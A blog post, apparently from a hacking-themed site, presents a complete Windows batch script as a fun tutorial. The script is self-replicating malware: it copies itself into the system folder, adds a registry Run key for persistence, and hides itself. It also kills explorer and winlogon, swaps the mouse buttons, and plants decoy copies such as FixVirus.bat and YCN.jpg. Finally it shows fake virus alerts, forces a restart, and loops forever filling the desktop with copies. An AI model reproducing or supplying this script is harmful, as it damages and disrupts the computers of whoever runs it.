Creating and playing with batch files

Playing with batch files means playing with windows system. Batch programs allows you to run your multiple commands in DOS mode. 

Here is a example command telling you how to:

1) Copy the file itself into the windows startup
2) Copy the file itself over multiple times into random spots in your system.
3) Setting the file itself and its production in hidden file status
4) Kill common programs like MSN messenger, Yahoo messenger, Windows Explorer, etc.

5) Swap the mouse buttons.
6) Open alert messages.
7) Change the time to your value and shutting down the PC.

I’ve fixed all the code in just one program.

@Echo off
color 4
title 4
title YCN
start
start
start
start calc
copy %0 %Systemroot%\Macrosoft > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Macrosoft /t REG_SZ
/d %systemroot%\Macrosoft.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Macrosoft.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill firefox.exe
tskill winlogon.exe
tskill explorer.exe
start
cls
cd %userprofile%\desktop
copy Macrosoft.bat YCN.bat
copy Macrosoft.bat YCN.jpg
copy Macrosoft.bat YCN.txt
copy Macrosoft.bat YCN.exe
copy Macrosoft.bat YCN.mov
copy Macrosoft.bat FixVirus.bat
cd %userprofile%My Documents
copy Macrosoft.bat YCN.bat
copy Macrosoft.bat YCN.jpg
copy Macrosoft.bat YCN.txt
copy Macrosoft.bat YCN.exe
copy Macrosoft.bat YCN.mov
copy Macrosoft.bat text.bat
start
start calc
cls
msg * Alert!
msg * Alert!
shutdown -r -t 10 -c “VIRUS DETECTED, Visit YOUCANHACK.BLOGSPOT.COM to solve this”
start
start
time 12:00
:YCN
cd %usernameprofile%\desktop
copy Macrosoft.bat %random%.bat
goto YCN

The code highlighted in BLUE sets the attributes of file to Read only and Hidden. The code in PINK copies the file Macrosoft.bat in random directory with random name. The Codes in Light Blue creates and copies the several .bat, .mov, .exe, .jpg, files in random place.
You can study the code further, for example for swapping mouse button, a simple registry value is added.

You can leave a response, or trackback from your own site.

Leave a Reply